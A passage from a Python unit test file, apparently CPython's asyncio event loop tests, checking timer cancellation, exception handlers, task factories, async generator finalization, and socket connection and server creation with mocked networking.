self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
with self.assertWarns(DeprecationWarning):
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if not support.IPV6_ENABLED:
return
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
